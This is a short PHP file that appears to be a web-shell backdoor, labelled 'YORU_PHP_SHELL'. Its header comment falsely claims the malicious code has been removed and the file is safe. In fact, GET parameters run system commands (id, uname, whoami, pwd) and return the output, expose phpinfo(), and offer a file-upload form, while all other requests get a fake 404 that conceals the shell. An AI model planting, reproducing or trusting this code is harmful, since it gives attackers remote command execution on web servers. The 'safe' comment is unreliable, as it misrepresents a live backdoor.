<?php

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


if(isset($_GET['id'])){
    die("<pre>".shell_exec('id')."</pre>");
}

if(isset($_GET['info'])){
    phpinfo();
    exit;
}

if(isset($_GET['sys'])){
    die("<pre>".shell_exec('uname -a;whoami;pwd')."</pre>");
}

if(isset($_GET['uploader'])){
    die('<form method=post enctype=multipart/form-data><input type=file name=0><input type=submit value=Up></form>');
}

http_response_code(404);
die("<h1>404 Not Found</h1>");
YORU_PHP_SHELL
?>